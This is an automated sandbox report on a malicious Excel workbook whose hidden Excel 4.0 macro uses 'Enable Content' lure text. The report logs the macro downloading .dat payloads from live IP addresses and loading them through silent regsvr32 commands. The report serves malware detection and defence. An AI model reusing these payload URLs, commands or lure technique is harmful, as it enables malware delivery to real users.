Loading ...

Play interactive tourEdit tour

Analysis Report banUwVSwBY

Overview

General Information

Sample Name:banUwVSwBY (renamed file extension from none to xlsx)
Analysis ID:431768
MD5:da5fb469bc9385f16af43843673cadc8
SHA1:414c25009dd7fad02b87f534779f6863a937aa93
SHA256:612d8808903469c5840e8697710abe11a2c7e75ccad1e61de969732c42271249
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Obfuscated Macro In XLSM
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2352 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2416 cmdline: regsvr32 -s ..\Post.storg MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2480 cmdline: regsvr32 -s ..\Post.storg1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2880 cmdline: regsvr32 -s ..\Post.storg2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
intlsheet4.xmlJoeSecurity_ObfuscatedMacroInXLSMYara detected Obfuscated Macro In XLSMJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\Post.storg, CommandLine: regsvr32 -s ..\Post.storg, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2352, ProcessCommandLine: regsvr32 -s ..\Post.storg, ProcessId: 2416

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.134:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.134:80
    Source: Joe Sandbox ViewIP Address: 51.89.115.124 51.89.115.124
    Source: global trafficHTTP traffic detected: GET /44356.3971392361.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.134Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44356.3971392361.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.124Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.134
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.134
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.134
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.134
    Source: unknownTCP traffic detected without corresponding DNS query: 37.1.196.25
    Source: unknownTCP traffic detected without corresponding DNS query: 37.1.196.25
    Source: unknownTCP traffic detected without corresponding DNS query: 37.1.196.25
    Source: unknownTCP traffic detected without corresponding DNS query: 37.1.196.25
    Source: unknownTCP traffic detected without corresponding DNS query: 37.1.196.25
    Source: unknownTCP traffic detected without corresponding DNS query: 37.1.196.25
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.124
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.124
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.124
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.124
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.134
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.124
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.124
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.134
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC5BF66.tifJump to behavior
    Source: global trafficHTTP traffic detected: GET /44356.3971392361.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.134Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44356.3971392361.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.124Connection: Keep-Alive
    Source: regsvr32.exe, 00000003.00000002.2206688614.0000000001D90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2207736998.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2208486859.0000000001CC0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 19 Once you have enabled editing, please click En
    Source: Screenshot number: 4Screenshot OCR: Enable Content button from the yellow bar above 20 21 22 23 24 25 26 27 28 29 30 31 32
    Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
    Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{34C063CF-955E-4ACE-9D4C-9A051EAF3AFA}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="2" r:id="rId1"/><sheet name="nowik" sheetId="13" state="hidden" r:id="rId2"/><sheet name="1rtgvrt" sheetId="3" state="hidden" r:id="rId3"/><sheet name="2dfgv" sheetId="4" state="hidden" r:id="rId4"/><sheet name="3fescvaer" sheetId="5" state="hidden" r:id="rId5"/><sheet name="4scdac" sheetId="6" state="hidden" r:id="rId6"/><sheet name="5fetaert" sheetId="7" state="hidden" r:id="rId7"/><sheet name="6vrtgarga" sheetId="8" state="hidden" r:id="rId8"/><sheet name="7rvgasdg" sheetId="9" state="hidden" r:id="rId9"/><sheet name="8aevgadrg" sheetId="10" state="hidden" r:id="rId10"/><sheet name="9rrvrv" sheetId="11" state="hidden" r:id="rId11"/><sheet name="10vghsdrb" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'10vghsdrb'!$A$2</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: classification engineClassification label: mal68.expl.evad.winXLSX@7/8@0/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$banUwVSwBY.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF44D.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg2
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storgJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg1Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg2Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: banUwVSwBY.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: banUwVSwBY.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: banUwVSwBY.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
    Source: banUwVSwBY.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings5.bin
    Source: banUwVSwBY.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings6.bin
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Data Obfuscation:

    barindex
    Yara detected Obfuscated Macro In XLSMShow sources
    Source: Yara matchFile source: intlsheet4.xml, type: SAMPLE
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://51.89.115.124/44356.3971392361.dat0%Avira URL Cloudsafe
    http://190.14.37.134/44356.3971392361.dat0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://51.89.115.124/44356.3971392361.datfalse
    • Avira URL Cloud: safe
    unknown
    http://190.14.37.134/44356.3971392361.datfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2206688614.0000000001D90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2207736998.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2208486859.0000000001CC0000.00000002.00000001.sdmpfalse
    • Avira URL Cloud: safe
    low

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    190.14.37.134
    unknownPanama
    52469OffshoreRacksSAPAfalse
    51.89.115.124
    unknownFrance
    16276OVHFRfalse
    37.1.196.25
    unknownUkraine
    28753LEASEWEB-DE-FRA-10DEfalse

    General Information

    Joe Sandbox Version:32.0.0 Black Diamond
    Analysis ID:431768
    Start date:09.06.2021
    Start time:09:30:51
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 6m 41s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:banUwVSwBY (renamed file extension from none to xlsx)
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:8
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal68.expl.evad.winXLSX@7/8@0/3
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/431768/sample/banUwVSwBY.xlsx

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    51.89.115.1249830484334-04292021.xlsmGet hashmaliciousBrowse
    • 51.89.115.124/44313,6048108796.dat
    9830484334-04292021.xlsmGet hashmaliciousBrowse
    • 51.89.115.124/44313,6048108796.dat
    9830484334-04292021.xlsmGet hashmaliciousBrowse
    • 51.89.115.124/44313,6048108796.dat
    24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 51.89.115.124/44313,6048108796.dat
    24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 51.89.115.124/44313,6048108796.dat
    24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 51.89.115.124/44313,6048108796.dat

    Domains

    No context

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    OVHFRCancellation_1844611233_06082021.xlsmGet hashmaliciousBrowse
    • 51.89.115.125
    Cancellation_1844611233_06082021.xlsmGet hashmaliciousBrowse
    • 51.89.115.125
    Tax Folder.docGet hashmaliciousBrowse
    • 145.239.131.51
    WlMsy0a1CN.exeGet hashmaliciousBrowse
    • 79.137.109.121
    #Ud83d#Udda8rocket.com 1208421(69-queue-2615.htmGet hashmaliciousBrowse
    • 145.239.131.51
    E91sLsvV8S.exeGet hashmaliciousBrowse
    • 144.217.14.109
    f.xlsGet hashmaliciousBrowse
    • 51.77.82.110
    50681.dllGet hashmaliciousBrowse
    • 51.77.82.110
    50681.dllGet hashmaliciousBrowse
    • 51.77.82.110
    SecuriteInfo.com.VB.Trojan.Valyria.4710.541.xlsGet hashmaliciousBrowse
    • 51.77.82.110
    fodeb.exeGet hashmaliciousBrowse
    • 51.222.195.7
    ayowa.exeGet hashmaliciousBrowse
    • 51.222.195.7
    Payment slip.exeGet hashmaliciousBrowse
    • 213.186.33.5
    03062021.exeGet hashmaliciousBrowse
    • 51.195.43.214
    A4C57DF59F0C85EEBCB7B40263D8C3DE037F41B7D2D43.exeGet hashmaliciousBrowse
    • 46.105.204.2
    ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
    • 54.38.220.85
    ConsoleApp1.exeGet hashmaliciousBrowse
    • 51.222.195.7
    http___pbfoa.org_d.exeGet hashmaliciousBrowse
    • 142.4.200.50
    cryptowall.exeGet hashmaliciousBrowse
    • 188.165.164.184
    treetop-payroll-075491-pdf.HtmLGet hashmaliciousBrowse
    • 145.239.131.51
    LEASEWEB-DE-FRA-10DEs1um6myHDC.exeGet hashmaliciousBrowse
    • 185.17.121.245
    SecuriteInfo.com.Trojan.Win32.Save.a.6900.exeGet hashmaliciousBrowse
    • 45.93.6.203
    BaU9m8mMFx.exeGet hashmaliciousBrowse
    • 45.93.5.54
    yl77tM4JDg.exeGet hashmaliciousBrowse
    • 45.93.5.54
    DHL4198278Err-PDF.exeGet hashmaliciousBrowse
    • 5.61.47.127
    PZ33n8HQNu.exeGet hashmaliciousBrowse
    • 45.93.6.203
    docs.docxGet hashmaliciousBrowse
    • 178.162.197.236
    docs.docxGet hashmaliciousBrowse
    • 178.162.197.236
    s.wbkGet hashmaliciousBrowse
    • 178.162.197.236
    hYIe5B4Xsz.exeGet hashmaliciousBrowse
    • 5.61.42.216
    DriverPack-17-Online.exeGet hashmaliciousBrowse
    • 178.162.204.5
    551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 46.165.221.217
    scan of document 5336227.xlsmGet hashmaliciousBrowse
    • 78.159.101.129
    scan of invoice 91510.xlsmGet hashmaliciousBrowse
    • 78.159.101.129
    generated payment 330070.xlsmGet hashmaliciousBrowse
    • 78.159.101.129
    BORMAR SA_Cotizaci#U00f3n de producto doc.exeGet hashmaliciousBrowse
    • 5.61.47.127
    namespaceFuncVar.dllGet hashmaliciousBrowse
    • 185.49.68.134
    lnho0DaeAk.exeGet hashmaliciousBrowse
    • 195.54.33.200
    WevBjZLm07.exeGet hashmaliciousBrowse
    • 195.54.33.200
    70Kx7b5fN9.exeGet hashmaliciousBrowse
    • 178.162.217.107
    OffshoreRacksSAPARebate_18082425_05272021.xlsmGet hashmaliciousBrowse
    • 190.14.37.102
    Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
    • 190.14.37.102
    DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
    • 190.14.37.121
    DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
    • 190.14.37.121
    Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
    • 190.14.37.102
    Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
    • 190.14.37.102
    Overdue_Debt_829721407_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113
    Overdue_Debt_829721407_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113
    Overdue_Debt_1885747285_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113
    Overdue_Debt_1885747285_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113
    Overdue_Debt_169149390_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113
    Overdue_Debt_1049025139_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113
    Overdue_Debt_809069792_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113
    Overdue_Debt_169149390_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113
    Overdue_Debt_1183261722_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113
    Overdue_Debt_1049025139_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113
    Overdue_Debt_809069792_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113
    Overdue_Debt_1183261722_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113
    Overdue_Debt_1807759904_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113
    Overdue_Debt_1807759904_06012021.xlsmGet hashmaliciousBrowse
    • 190.14.37.113

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC5BF66.tif
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:TIFF image data, little-endian, direntries=19, height=1600, bps=53710, compression=LZW, PhotometricIntepretation=RGB, width=1600
    Category:dropped
    Size (bytes):315878
    Entropy (8bit):7.988901270632308
    Encrypted:false
    SSDEEP:6144:hRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZN3:hRMmEv2Bc/nvm8IKABfsYOmauFD
    MD5:BB737290D394078D8A16D5509C5BC970
    SHA1:C8A63B0AB1EB7745A0027E0A17A6CB4C6F79487E
    SHA-256:E11121ECA3FAD55F66EA240EADD4F5B4C978828C94C34736F7673540529B17A5
    SHA-512:3D8A6025171D283FA08D8A5BA4EAAD1EABAD55D7D34629F17F4C6601DD4438FB536B29D7B8CA71E540EDB782433118628EBD3A56CE8FFA453C6A45792425CB9A
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: II*..................h\*.......t2#...1..Z)....).~9&.H.r.,.C+.I....e-.M.Si..}0.K.SJ...3.Ng.ZL..G.S..:m..N.Tk5..Z.Z...+.~.f.X.v.-..k.Y.....m.].Wk...p.[.WL...s.^o.\M....c..<n/!..ds9..[)...-..9..h.z...C..i....e..m.[m..}..k.[N.....nw.^N....s..>o/.r.....C4U.kw{......f..~.W....y........y...'...;.R..<.[..;....o...T.....+......?p....N.....#........ht'...Q..E....CQ.^.\m.E......o.Ba[.#Dp...>.<c .1$.*.Q.E....Ir..+.....Y.(H..*K..{..Q...I.....R.Y(Fr|m<$.l...RL.&.3..GP0..D....=.s.5CT,.FN.==7Sq...Iu.3JQ.%GUKS..X...5V.Hu.Z..9T..O4...KC.5.N.Q..aD...g.V.Mh.m.c.M.eMSe.?V..UoR...j....<]...G.v.B$v\Iv[.].f...N\...y_...M....p`w..b.6%.a......T3.c..S.WQ...S......tHk[7.[4;..k.#....~e...f.m.&...-.iz6....V5.jzN...:.3.k.......M..[......m[N...~.nz~.o...k....;.........y..{`.......u..|?-.q.f...|...m6...b..#..]'5..<...g.7_........q.u..].....$[.....~...+..I.p.zt.Y.N.}.............FS5.....k..H...#....~.w.....:...?........"..... 4..PB.A....l...j...... .p..BX1..D..0..Bx
    C:\Users\user\AppData\Local\Temp\060F0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):340118
    Entropy (8bit):7.979728389096268
    Encrypted:false
    SSDEEP:6144:lwOMRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZN6:lwOMRMmEv2Bc/nvm8IKABfsYOmauFaV
    MD5:7BA4B91B8DE777EBD4732DD6532D07AA
    SHA1:A6C45F27BA322D4A1C527573937A102686DE7F72
